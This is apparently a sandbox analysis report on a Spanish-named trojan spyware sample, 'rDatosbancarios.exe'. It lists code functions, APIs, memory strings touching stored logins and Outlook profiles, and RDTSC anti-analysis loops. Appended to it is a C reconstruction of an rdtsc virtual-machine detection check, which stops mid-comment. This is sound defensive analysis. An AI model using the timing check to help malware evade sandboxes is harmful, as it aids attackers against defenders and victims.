            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB1B6810_2_36DB1B68
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB9C6810_2_36DB9C68
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBF26810_2_36DBF268
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB716010_2_36DB7160
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB446710_2_36DB4467
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB291810_2_36DB2918
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBB91810_2_36DBB918
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB091810_2_36DB0918
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB761810_2_36DB7618
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBA11F10_2_36DBA11F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB4B1D10_2_36DB4B1D
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBE41210_2_36DBE412
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB8E1010_2_36DB8E10
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB630810_2_36DB6308
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBFC0810_2_36DBFC08
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB290810_2_36DB2908
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBD10010_2_36DBD100
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB8E0010_2_36DB8E00
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBB90710_2_36DBB907
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB323810_2_36DB3238
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBCC3810_2_36DBCC38
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBA13010_2_36DBA130
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB123710_2_36DB1237
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB893710_2_36DB8937
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB322A10_2_36DB322A
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB092810_2_36DB0928
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB762810_2_36DB7628
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DB5E2F10_2_36DB5E2F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBF72F10_2_36DBF72F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBE42010_2_36DBE420
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DBCC2710_2_36DBCC27
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DDBE1010_2_36DDBE10
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD57C010_2_36DD57C0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DDF5A010_2_36DDF5A0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD3EC010_2_36DD3EC0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD0CC010_2_36DD0CC0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD28E010_2_36DD28E0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD229010_2_36DD2290
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD928110_2_36DD9281
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD388010_2_36DD3880
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD068010_2_36DD0680
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD0CAF10_2_36DD0CAF
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD54A010_2_36DD54A0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD22A010_2_36DD22A0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD324010_2_36DD3240
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD004010_2_36DD0040
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD4E6010_2_36DD4E60
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD1C6010_2_36DD1C60
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DDF21F10_2_36DDF21F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD481010_2_36DD4810
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD2C0010_2_36DD2C00
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DDF22810_2_36DDF228
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD482010_2_36DD4820
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD162010_2_36DD1620
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD25C010_2_36DD25C0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD41E010_2_36DD41E0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD0FE010_2_36DD0FE0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DDE79810_2_36DDE798
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DDF59010_2_36DDF590
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DDE78F10_2_36DDE78F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD1F8010_2_36DD1F80
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD518010_2_36DD5180
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD3BA010_2_36DD3BA0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD09A010_2_36DD09A0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD4B4010_2_36DD4B40
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD194010_2_36DD1940
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD517010_2_36DD5170
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD356010_2_36DD3560
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD036010_2_36DD0360
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD450010_2_36DD4500
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD130010_2_36DD1300
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DDD53810_2_36DDD538
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DD2F2010_2_36DD2F20
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE6C8810_2_36DE6C88
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEE66810_2_36DEE668
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEE34810_2_36DEE348
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE050810_2_36DE0508
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DED6C810_2_36DED6C8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE72C810_2_36DE72C8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEA4C810_2_36DEA4C8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE04F710_2_36DE04F7
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEAAF710_2_36DEAAF7
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEF2E810_2_36DEF2E8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEC0E810_2_36DEC0E8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE8EE810_2_36DE8EE8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE889810_2_36DE8898
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEEC9810_2_36DEEC98
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DED08810_2_36DED088
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE9E8810_2_36DE9E88
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEECA810_2_36DEECA8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE88A810_2_36DE88A8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEBAA810_2_36DEBAA8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEFC4810_2_36DEFC48
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DECA4810_2_36DECA48
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE984810_2_36DE9848
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE004010_2_36DE0040
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE826810_2_36DE8268
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEB46810_2_36DEB468
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEAE1A10_2_36DEAE1A
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE001110_2_36DE0011
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEF60810_2_36DEF608
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEC40810_2_36DEC408
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE920810_2_36DE9208
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEFC3710_2_36DEFC37
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEE02810_2_36DEE028
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE7C2810_2_36DE7C28
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEAE2810_2_36DEAE28
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEEFC810_2_36DEEFC8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE8BC810_2_36DE8BC8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEBDC810_2_36DEBDC8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEC3F910_2_36DEC3F9
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DED9E810_2_36DED9E8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE75E810_2_36DE75E8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEA7E810_2_36DEA7E8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DED39710_2_36DED397
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEE98810_2_36DEE988
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEB78810_2_36DEB788
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE858810_2_36DE8588
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DED3A810_2_36DED3A8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE6FA810_2_36DE6FA8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEA1A810_2_36DEA1A8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE7F4810_2_36DE7F48
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEB14810_2_36DEB148
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEE97810_2_36DEE978
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DECD6810_2_36DECD68
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE9B6810_2_36DE9B68
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEDD0810_2_36DEDD08
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE790810_2_36DE7908
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEAB0810_2_36DEAB08
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE2D3010_2_36DE2D30
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEF92810_2_36DEF928
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEC72810_2_36DEC728
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE952810_2_36DE9528
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1153010_2_36E11530
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E11C1810_2_36E11C18
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1076010_2_36E10760
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1230010_2_36E12300
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1004010_2_36E10040
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E10E4810_2_36E10E48
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1E94810_2_36E1E948
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1152110_2_36E11521
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E11C0810_2_36E11C08
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1075010_2_36E10750
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E122F110_2_36E122F1
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1001110_2_36E10011
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E10E3810_2_36E10E38
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36F1230010_2_36F12300
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36F1044810_2_36F10448
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36F17B7010_2_36F17B70
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36F1106010_2_36F11060
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: String function: 00402BBF appears 51 times
            Source: rDatosbancarios.exe, 00000000.00000002.2062246203.0000000000492000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedolcan.exeV vs rDatosbancarios.exe
            Source: rDatosbancarios.exe, 0000000A.00000002.3041036000.0000000000492000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedolcan.exeV vs rDatosbancarios.exe
            Source: rDatosbancarios.exe, 0000000A.00000002.3065072849.0000000033B67000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rDatosbancarios.exe
            Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.0000000003782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rDatosbancarios.exe
            Source: rDatosbancarios.exeBinary or memory string: OriginalFilenamedolcan.exeV vs rDatosbancarios.exe
            Source: rDatosbancarios.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/21@5/5
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 10_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_004033B6
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046DD
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_00402095 CoCreateInstance,0_2_00402095
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File created: C:\Users\user\skraldemnd
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File created: C:\Users\user\AppData\Local\Temp\nst3D83.tmp
Source: rDatosbancarios.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E9E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E8E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033EAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: rDatosbancarios.exe | Virustotal: Detection: 45%
Source: rDatosbancarios.exe | ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File read: C:\Users\user\Desktop\rDatosbancarios.exe
Source: unknown | Process created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Process created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Process created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File written: C:\Users\user\skraldemnd\Foreprovided\Dowl\mikrometer.ini
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: rDatosbancarios.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match | File source: 00000000.00000002.2064115944.0000000004506000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File created: C:\Users\user\AppData\Local\Temp\nsp3EED.tmp\System.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Process information set: NOOPENFILEERRORBOX (59 identical entries)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\rDatosbancarios.exe | API/Special instruction interceptor: Address: 474C56F
Source: C:\Users\user\Desktop\rDatosbancarios.exe | API/Special instruction interceptor: Address: 2ECC56F
Source: C:\Users\user\Desktop\rDatosbancarios.exe | RDTSC instruction interceptor: First address: 4723561 second address: 4723561 instructions:
    0x00000000 rdtsc
    0x00000002 cmp ebx, ecx
    0x00000004 jc 00007F1160D547CAh
    0x00000006 inc ebp
    0x00000007 inc ebx
    0x00000008 rdtsc
Source: C:\Users\user\Desktop\rDatosbancarios.exe | RDTSC instruction interceptor: First address: 2EA3561 second address: 2EA3561 instructions:
    0x00000000 rdtsc
    0x00000002 cmp ebx, ecx
    0x00000004 jc 00007F1160E0823Ah
    0x00000006 inc ebp
    0x00000007 inc ebx
    0x00000008 rdtsc
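Added example, not code from the sample, from Joe Sandbox or from any published GuLoader analysis: a minimal C reconstruction of the kind of rdtsc timing loop intercepted at 0x4723561 and 0x2EA3561 above (rdtsc, compare, conditional branch, counter increment, rdtsc). The report shows only the loop body, not the values it compares against, so the threshold (RDTSC_VM_THRESHOLD), the sample count (RDTSC_SAMPLES) and the decision rule in looks_instrumented are assumptions chosen for illustration. The non-x86 fallback exists only so the example compiles everywhere; the real check depends on the rdtsc instruction itself.

```c
/*
 * Added example (not the sample's code): shape of an rdtsc timing check.
 * Assumptions: RDTSC_VM_THRESHOLD, RDTSC_SAMPLES and the decision rule are
 * illustrative values, not figures taken from the report.
 */
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
/* Raw time-stamp counter: the same instruction the intercepted loop executes. */
static uint64_t read_tsc(void) { return __rdtsc(); }
#else
#include <time.h>
/* Non-x86 fallback so the example still builds: nanosecond monotonic clock. */
static uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}
#endif

#define RDTSC_VM_THRESHOLD 0x1000ULL  /* assumed: max ticks between back-to-back rdtsc */
#define RDTSC_SAMPLES      256        /* assumed: number of rdtsc pairs to measure */

/* One measurement: ticks consumed between two consecutive rdtsc reads. */
static uint64_t tsc_delta_once(void) {
    uint64_t t0 = read_tsc();
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Smallest delta over n samples. A hypervisor that traps rdtsc, or a tool that
 * single-steps the loop, inflates every delta, so even the minimum stays far
 * above what bare metal produces (typically a few dozen ticks). */
uint64_t tsc_delta_min(int n) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < n; i++) {
        uint64_t d = tsc_delta_once();
        if (d < best) best = d;
    }
    return best;
}

/* Number of samples above the threshold. The intercepted loop increments ebp
 * on every pass; whether that register counts outliers or iterations is not
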